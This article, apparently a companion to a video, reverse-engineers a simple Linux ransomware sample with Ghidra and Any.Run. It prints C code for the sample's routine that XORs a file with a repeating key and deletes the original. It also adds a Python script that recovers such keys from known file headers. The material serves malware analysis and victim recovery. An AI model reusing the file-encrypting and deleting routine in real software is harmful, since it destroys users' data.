We analyzed a sample Linux ransomware using reverse engineering tools such as Ghidra and Radare2. Additionally, we performed dynamic malware analysis by running the sample in an Ubuntu environment using the Any.Run online sandbox.
What is Reverse Engineering
Reverse engineering is an advanced method for analyzing binaries, including malware samples. It requires knowledge of the CPU's language, that is, assembly. In reverse engineering, we disassemble the binary back into its CPU language to reveal every instruction it issues to the CPU.
Linux Ransomware
Even though Linux is thought to be safer than other operating systems, ransomware and other malicious attacks can still affect it. Malicious software known as “ransomware” encrypts files on a victim’s computer and demands a ransom to unlock the files.
In recent years, Linux computers have been the victim of multiple ransomware incidents. The “Linux.Encoder” ransomware, which first surfaced in 2015, is one such instance. Specifically designed to encrypt files on Linux-based web servers, this ransomware demanded a payment from the server administrators.
Like any other operating system, Linux computers are susceptible to security holes and attacks, which is why they can become infected with ransomware. Despite being open-source software and having strong security features, Linux is not impervious to bugs. Cybercriminals may use these vulnerabilities to get unauthorized access to Linux systems and install ransomware.
Linux Ransomware Analysis with Ghidra
We analyzed the given sample in the video using Ghidra by dissecting the logic of functions such as:
- main function
- process.directory function
- encrypt_files function
We saw that the main function contains only one call to the process.directory function passing two arguments:
- the directory to be encrypted
- the encryption string
The process.directory function loops through every file inside the given directory and XOR-encrypts each one with the encryption string by calling the encrypt_files function.
Check out below the source code of the encrypt_file function:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    void encrypt_file(char *filename, char *s) {
        FILE *stream = fopen(filename, "rb");
        if (stream == NULL) {
            printf("Error opening file: %s\n", filename);
            return;
        }
        /* Measure the file, then read it into memory in one go */
        fseek(stream, 0, SEEK_END);
        long nitems = ftell(stream);
        rewind(stream);
        char *ptr = (nitems < 0) ? NULL : (char *)malloc(nitems);
        if (ptr == NULL || fread(ptr, 1, nitems, stream) != (size_t)nitems) {
            printf("Error reading file: %s\n", filename);
            free(ptr);
            fclose(stream);
            return;
        }
        fclose(stream);
        /* XOR every byte with the repeating key s: this is the "encryption" */
        size_t keylen = strlen(s);
        for (long i = 0; keylen > 0 && i < nitems; i++) {
            ptr[i] ^= s[i % keylen];
        }
        /* Write the XORed bytes to a fixed output file name */
        FILE *output = fopen("output_file.txt", "wb");
        if (output == NULL) {
            printf("Error creating note file: %s\n", "output_file.txt");
            free(ptr);
            return;
        }
        fwrite(ptr, 1, nitems, output);
        fclose(output);
        free(ptr);
        /* Delete the original, leaving only the encrypted copy */
        int result = remove(filename);
        if (result != 0) {
            printf("Error deleting original file: %s\n", filename);
        }
    }

    int main() {
        char *filename = "example.txt";
        char *s = "some_key";
        encrypt_file(filename, s);
        return 0;
    }
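The XOR scheme described above is not real encryption: XOR is its own inverse, and a short key that repeats over the file can be derived from any known plaintext bytes, such as a file-format header. The following recovery script is an added example written for this article, not code from the sample or from the original page. It assumes the key repeats byte-by-byte over the whole file (as in the listing), uses the key value "some_key" from the sample's main() only to build a constructed test file, and assumes the victim file is a PNG, whose first 16 bytes (signature plus IHDR chunk length and type) are fixed by the format.

```python
# Added example: recovering files XOR-encrypted with a short repeating key.
# Not part of the original article or the analyzed sample.
from itertools import cycle

# A PNG always starts with the 8-byte signature, then the IHDR chunk length
# (13) and the chunk type "IHDR": 16 bytes of known plaintext.
PNG_KNOWN_PREFIX = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR"

# Constructed sample data: a fake PNG body and the key from the article's main().
SAMPLE_KEY = b"some_key"
SAMPLE_PLAINTEXT = PNG_KNOWN_PREFIX + bytes(range(64)) + b"IEND\xaeB`\x82"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key. Because XOR is its own inverse, this
    reproduces the sample's 'encryption' and also undoes it."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


# What a victim file looks like after the sample has processed it.
SAMPLE_CIPHERTEXT = xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY)


def recover_key(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Recover the repeating key from a known plaintext prefix.

    ciphertext[i] ^ known_plaintext[i] yields the key stream for the first
    len(known_plaintext) bytes; the key is the shortest period of that stream.
    This only works when the known prefix is at least as long as the key, so
    verify the result on a second file before trusting it.
    """
    if len(known_plaintext) > len(ciphertext):
        raise ValueError("known plaintext longer than ciphertext")
    stream = bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    return stream  # not reached: period == len(stream) always matches


def recover_and_decrypt(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Derive the key from the known prefix and decrypt the whole file."""
    key = recover_key(ciphertext, known_plaintext)
    return xor_bytes(ciphertext, key)


if __name__ == "__main__":
    key = recover_key(SAMPLE_CIPHERTEXT, PNG_KNOWN_PREFIX)
    print("recovered key:", key)
    restored = recover_and_decrypt(SAMPLE_CIPHERTEXT, PNG_KNOWN_PREFIX)
    print("file restored:", restored == SAMPLE_PLAINTEXT)
```

In practice the recovered key should be confirmed against a second encrypted file with a different known header; if the known prefix is shorter than the key, the shortest-period search returns a truncated key and the rest of the file will decrypt to garbage.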
Linux Ransomware Analysis with Any.Run
We also analyzed the sample using Any.Run; check out the video below to see the execution of the given Linux ransomware in an Ubuntu environment.
Check out the video below for a detailed explanation.